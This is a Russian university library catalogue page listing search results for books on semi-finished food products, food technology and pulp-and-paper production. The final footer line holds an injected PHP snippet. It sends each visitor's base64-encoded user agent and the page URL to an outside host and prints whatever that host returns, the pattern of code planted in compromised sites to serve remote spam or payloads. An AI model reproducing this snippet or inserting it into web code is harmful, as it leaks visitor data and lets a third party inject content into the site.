Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

62 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПОЛУФАБРИКАТЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 64
1. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : Учеб. / Н. Г. Бутейкис, А. А. Жукова, 2003. - 300 с.
Держатели документа (Информация об экземплярах) 
2. 
Барановский В. А. Кондитер [Текст] : Учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Т. И. Перетятко, 2003. - 381 с.
Держатели документа (Информация об экземплярах) 
3. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : Учеб. / Н. Г. Бутейкис, А. А. Жукова, 2001. - 300 с.
Держатели документа (Информация об экземплярах) 
4. 
Дубцов Г. Г. Технология приготовления пищи [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Г. Г. Дубцов, 2001. - 269 с.
Держатели документа (Информация об экземплярах) 
5. 
Дубцов Г. Г. Технология приготовления пищи [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Г. Г. Дубцов, 2002. - 269 с.
Держатели документа (Информация об экземплярах) 
6. 
Кецелашвили Д. В. Технология мяса и мясных продуктов. В 3 ч. Ч. 1 [Текст] : учеб.особие для студентов специальности 270900 "Технология мяса и мясных продуктов" всех форм обучения / Д. В. Кецелашвили, 2004. - 129 с.
Держатели документа (Информация об экземплярах) 
7. 
Артемова Е. Н. Основы технологии продукции общественного питания [Текст] : учеб. пособие для студентов высш. учеб. заведений / Е. Н. Артемова, 2008. - 331 с.
Ключевые слова 
ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- МЕНЮ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ПРОФИЛАКТИЧЕСКОЕ -- ПИТАНИЕ ДЕТЕЙ -- Питание работников умственного труда -- Питание работников физического труда -- КОНТРОЛЬ КАЧЕСТВА ПРОДУКЦИИ -- Контроль качества сырья -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- ПОЛУФАБРИКАТЫ овощные -- Полуфабрикаты кулинарных изделий -- Полуфабрикаты мучных изделий -- Норма выхода продукции -- Расчет расходов сырья
Держатели документа (Информация об экземплярах) 
8. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : учебник / Н. Г. Бутейкис, А. А. Жукова, 2007. - 300 с.
Держатели документа (Информация об экземплярах) 
9. 
Чепурной И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учеб. / И. П. Чепурной , 2007. - 459 с.
Держатели документа (Информация об экземплярах) 
10. 
Сборник рецептур мучных кондитерских и булочных изделий [Текст] : Для предприятий общественного питания / Сост. А. В. Павлов, 2001. - 294 с.
Держатели документа (Информация об экземплярах) 
11. 
Шепелев А. Ф. Товароведение и экспертиза рыбы и рыбных товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, О. И. Кожухова. - 154 с.
12. 
Творчество молодых: дизайн, реклама, полиграфия [Текст] : материалы VII Междунар. конф.студентов и аспирантов "Социальные проблемы современного города в визуальной культуре: творчество молодых" / ОмГТУ [и др.], 2008. - 165 с.
Ключевые слова 
ОМПИ -- ОМГТУ -- ВИЗУАЛЬНАЯ -- КУЛЬТУРА -- ГОРОД -- ОМСК -- ИНСТАЛЛЯЦИЯ -- КАРНАВАЛ -- ИЗОБРАЖЕНИЕ -- ТЕКСТОВАЯ -- НАДПИСЬ -- БУКВА -- ЦИФРА -- ИЗОБРАЗИТЕЛЬНОЕ -- ИСКУССТВО -- ЖУРНАЛ -- ПЕРИОДИЧЕСКОЕ -- ИЗДАНИЕ -- НЕОАРХАИКА -- БЭНКСИ -- СОЦИАЛЬНАЯ -- АГРЕССИЯ -- ХУДОЖЕСТВЕННЫЙ -- ЭПАТАЖ -- ИМИДЖ -- ЦВЕТ -- КИНОДИЗАЙН -- ОБРАЗ -- НАРУЖНАЯ -- ПЛАКАТ -- СОЦИАЛЬНЫЙ -- КОММЕРЧЕСКАЯ -- БУКВА -- КОНЬ -- КРЫЛАТЫЙ -- ГРАФИЧЕСКИЙ -- АФИША -- ТЕАТРАЛЬНАЯ -- НОВАТОРСТВО -- ТРАДИЦИЯ -- ХУДОЖЕСТВЕННАЯ -- КОВКА -- МЕТАЛЛ -- АРХИТЕКТУРА -- МОДЕРН -- НЕОМОДЕРН -- ОБРАЗ -- РУССКОЕ -- НАРОДНОЕ -- ТВОРЧЕСТВО -- ОБРАЗОВАТЕЛЬНАЯ -- УСЛУГА -- ЖЕНСКИЙ -- ТОЛЕРАНТНОСТЬ -- ПОЛУФАБРИКАТ -- НЕДВИЖИМОСТЬ -- ВУЗ -- ИНСТИТУТ -- ИНТЕРНЕТ-ЗАВИСИМОСТЬ -- РЕКЛАМНАЯ -- КАМПАНИЯ -- БЫСТРОЕ -- ПИТАНИЕ -- СОЛЯРИЙ -- САЛОН КРАСОТЫ -- ПРАВДА -- ВЫМЫСЕЛ -- СТЕРЕОТИП -- ПОСТМОДЕРНИЗМ -- САЙТ -- КОММУНИКАЦИЯ -- РЕКЛАМИРОВАНИЕ -- КАФЕ -- РЕСТОРАН -- ТКАНЬ -- ПЕЧАТЬ -- КНИГА -- МИНИАТЮРНАЯ -- УПАКОВКА -- БУМАГА -- ПРОЧНОСТЬ -- ПОЛИГРАФИЧЕСКОЕ -- ПРЕДПРИЯТИЕ -- УПРАВЛЕНИЕ -- МУАРООБРАЗОВАНИЕ -- ТЕСТОВАЯ -- СИСТЕМА -- ПЕЧАТНАЯ -- ФОРМА -- ТРАФАРЕТНАЯ -- КАРТОГРАФИЯ -- КАРТОН -- УПРОЧНЕНИЕ
Оглавление 
  • Кичигина, Анастасия Георгиевна. Проявление диахронизма в искусстве неоархаики: нарасчлененность обыденного и "чудесного" / А. Г. Кичигина. - с.18-20
  • Кичигина, Анастасия Георгиевна. исследование и творчество в искусстве неоархаики / А. Г. Кичигина. - с.20-22
  • Лугина, Яна Александровна. Психологическое назначение цвета в дизайне жизненного пространства человека / Я. А. Лугина, Т. М. Кошелева. - с.28-30
  • Лугина, Яна Александровна. Цветовое воздействие в рекламе / Я. А. Лугина, Ю. В. Байбарза. - с.64-66
  • Ткаченко, Ольга Николаевна. Коммерциализация социальной рекламы и социальная ответственность бизнеса / О. Н. Ткаченко, Е. В. Гомалач. - с.73-76
  • Бернадская, Юлия Сергеевна. Специфика рекламирования товарной категории "Полуфабрикаты" / Ю. С. Бернадская, И. Елизарова. - с.78-80
  • Ткаченко, Ольга Николаевна. Социальная реклама государственных институтов / О. Н. Ткаченко, Т. С. Манойло. - с.86-88
  • Бернадская, Юлия Сергеевна. Разработка рекламной кампании для предприятия быстрого питания / Ю. С. Бернадская, М. А. Пешехонова. - с.93-95
  • Бернадская, Юлия Сергеевна. Основные тенденции в рекламе салонов красоты и соляриев / Ю. С. Бернадская, Е. Попова. - с.95-96
  • Пригода, Нина Сергеевна. Межкультурная толерантность как императив взаимодействия культур / Н. С. Пригода, Л. М. Дмитриева. - с.97-99
  • Бернадская, Юлия Сергеевна. Специфика рекламирования радиоуправляемых моделей / Ю. С. Бернадская, Е. В. Стрельцова. - с.105-107
  • Ткаченко, Ольга Николаевна. Уровни реализации стереотипов средствами рекламы / О. Н. Ткаченко, Л. М. Дмитриева. - с.107-109
  • Ткаченко, Ольга Николаевна. Характеристика рекламы как явления постмодернизма / О. Н. Ткаченко, Л. М. Дмитриева. - с.109-112
  • Бернадская, Юлия Сергеевна. Особенности рекламирования кафе и ресторанов / Ю. С. Бернадская, Т. А. Шутимова. - с.121-123
  • Андреев, Рудольф Петрович. Термотрансферные технологии печати на тканях / Р. П. Андреев, Н. И. Антонова. - с.124-127
  • Варепо, Лариса Григорьевна. Печатьна композиционных упаковочных материалах: проблемы и причины их возникновения / Л. Г. Варепо, А. С. Борисова. - с.130-132
  • Варепо, Лариса Григорьевна. Моделирование оценки красковосприятия / Л. Г. Варепо, О. А. Колозова, А. С. Борисова. - с.142-144
  • Литунов, Сергей Николаевич. Исследование муарообразования при использовании структур с различной упаковкой ячеек / С. Н. Литунов, О Петраш, О. Фадеева. - с.144-148
Держатели документа (Информация об экземплярах) 
Полный текст
13. 
Технология целлюлозно-бумажного производства [Текст] : справ. материалы: в 3 т. / Всерос. науч.-исслед. ин-т целлюлоз.-бумаж. пром-сти ; редкол.: П. С. Осипов [и др.]. Т. 1 : Сырье и производство полуфабрикатовЧ. 3. / С. С. Пузырев [и др.], 2004. - 316 с.
Держатели документа (Информация об экземплярах) 
14. 
Технология целлюлозно-бумажного производства [Текст] : справ. материалы: в 3 т. / Всерос. науч.-исслед. ин-т целлюлоз.-бумаж. пром-сти ; редкол.: П. С. Осипов [и др.]. Т. 1. : Сырье и производство полуфабрикатовЧ. 2. / Г. Л. Аким [и др.], 2003. - 633 с.
Держатели документа (Информация об экземплярах) 
15. 
Касаткин А. В. Драгоценные металлы: правовое регулирование сделок [Текст] : норматив. акты по состоянию на 15 июля 2001 г. / А. В. Касаткин, 2001. - 139 с.
Держатели документа (Информация об экземплярах) 
16. 
Коснырева, Людмила Михайловна. Товароведение и экспертиза мяса и мясных товаров [Текст] : Учебник гриф-УМО / Л. М. Коснырева, В. И. Криштафович, В. М. Позняковский, 2005. - 320 с.
Держатели документа (Информация об экземплярах) 
17. 
Товароведение и экспертиза потребительских товаров [Текст] : Учебник для студентов торговых вузов / рук. авт. кол. В.В. Шевченко, 2003. - 544 с.
Ключевые слова 
товароведение -- экспертиза товаров -- ЗЕРНОМУЧНЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ТОВАРОВЕДЕНИЕ -- КОНСЕРВИРОВАНИЕ -- ТАРА -- УПАКОВКА -- КРУПА -- МУКИ -- ХЛЕБ -- ХЛЕБОБУЛОЧНЫЕ ИЗДЕЛИЯ -- МАКАРОННЫЕ ИЗДЕЛИЯ -- ТОВАРОВЕДЕНИЕ ПЛОДОВ И ОВОЩЕЙ -- ГРИБЫ -- ЧАЙ -- КОФЕ -- НАПИТКИ БЕЗАЛКОГОЛЬНЫЕ -- НАПИТКИ АЛКОГОЛЬНЫЕ -- ТАБАЧНАЯ ПРОДУКЦИЯ -- ПРЯНОСТИ -- ПРИПРАВЫ -- МЕД -- ТОВАРОВЕДЕНИЕ КОНДИТЕРСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- СЫР -- МОРОЖЕНОЕ -- МАЙОНЕЗ -- МЯСНЫЕ КОНСЕРВЫ -- ПОЛУФАБРИКАТЫ -- ЯЙЦА -- ИКРА
Держатели документа (Информация об экземплярах) 
18. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
19. 
Шевченко, Вера Валерьяновна. Товароведение и экспертиза качества рыбы и рыбных товаров [Текст] : Уч.пособие гриф-УМО / В.В. Шевченко, 2005. - 253 с.
Держатели документа (Информация об экземплярах) 
20. 
Технология целлюлозно-бумажного производства [Текст] : справ. материалы: в 3 т. / Всерос. науч.-исслед. ин-т целлюлоз.-бумаж. пром-сти ; редкол.: П. С. Осипов [и др.]. Т. 1 : Сырье и производство полуфабрикатовЧ. 1, 2002. - 420, [5] с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2960 - 18.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.35 с.12 запросов, 0.74c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;